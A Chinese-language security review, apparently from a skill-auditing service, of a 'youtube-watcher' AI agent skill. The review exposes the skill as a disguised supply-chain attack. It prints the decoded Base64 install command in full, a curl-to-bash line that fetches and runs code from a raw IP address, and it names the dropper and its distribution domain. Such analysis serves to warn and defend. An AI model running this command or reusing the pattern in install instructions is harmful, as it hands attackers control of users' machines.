youtube-watcher

核心用法

YouTube Watcher 声称是一款用于获取 YouTube 视频转录文本的 Skill，支持视频内容摘要、问答和信息提取。用户需提供 YouTube 视频链接，该工具通过调用 yt-dlp 提取字幕或自动生成的字幕内容，进而支持后续的文字处理。

使用流程上，用户通过触发词如 "watch youtube"、"summarize video" 等激活 Skill，然后执行 Python 脚本 get_transcript.py 获取转录文本。理论上，该 Skill 适用于需要快速了解视频内容、提取关键信息或进行内容二次创作的场景。

显著优点

从功能设计角度看，该 Skill 的目标场景具有一定的实用性：YouTube 作为全球最大的视频平台，大量用户有将视频内容转化为文字的需求，无论是学习笔记、内容审核还是研究分析，自动化的转录提取确实能提升效率。若能安全实现，该工具可成为研究者、内容创作者和教育工作者的辅助利器。

潜在缺点与局限性

然而，该 Skill 存在致命缺陷。其核心依赖 "OpenClawProvider" 的安装指引中暗藏恶意代码，而非真正提供视频转录功能。即使忽略安全问题，该工具的实际功能也受限于 YouTube 的字幕可用性——无字幕视频无法处理，且转录质量取决于 YouTube 自动字幕的准确性，多语言支持也存在局限。

适合的目标群体

该 Skill 不适合任何用户群体使用。 尽管表面上看似适合需要视频内容分析的研究者、学生、内容创作者，但其内置的恶意代码使其成为安全威胁。任何试图使用该 Skill 的用户都可能面临系统受损和数据泄露风险。

使用风险

该 Skill 存在极端严重的安全风险：执行后会从可疑远程服务器（91.92.242.30）下载并执行未知代码，采用典型的供应链攻击手法；可能造成系统信息窃取、恶意软件植入、文件加密勒索等不可逆损害；且攻击代码经过 base64 编码伪装，普通用户难以识别。

核心用法

该Skill伪装成YouTube视频转录工具，声称可获取视频字幕并进行摘要分析。表面功能包括：通过yt-dlp提取YouTube视频字幕、生成文本摘要、支持内容问答。用户需提供YouTube链接，Skill调用脚本返回转录文本。

显著优点（伪装层面）

• 声称支持自动字幕与人工字幕识别
• 提供看似完整的命令行调用示例
• 文档结构模仿正规开发工具

严重安全缺陷与恶意行为

核心威胁为供应链攻击：

1. 动态代码执行（RISK-001）：MacOS安装说明中嵌入Base64编码命令，解码后执行/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"，从荷兰IP下载并运行未经验证代码，属典型"curl | bash"攻击模式。

2. 代码混淆（RISK-002）：使用Base64编码隐藏真实命令意图，规避静态安全检测，为恶意软件常用传播手法。

3. 可疑网络行为（RISK-003）：直接访问IP地址而非域名，规避黑名单检测，增加恶意代码托管隐蔽性。

4. 社工诱导（RISK-004）：引导用户下载未验证程序（OpenClawProvider），来源GitHub用户"syazema"及域名install.app-distribution.net均无可信度背书。

适合人群

绝对不适合任何用户。该Skill为高危恶意软件，不应安装或使用。

常规风险

• 完全系统接管：攻击者可窃取敏感数据、安装后门、建立持久化控制
• 供应链污染：可能进一步传播至用户其他系统或代码仓库
• 数据泄露：未声明的数据收集行为违反GDPR/CCPA

技术细节

• 依赖要求：yt-dlp（表面）+ 强制安装"OpenClawProvider"（实际攻击载荷）
• 可疑端点：http://91.92.242.30（HTTP明文）、install.app-distribution.net
• 安全评分：0/100，评级D（危险级）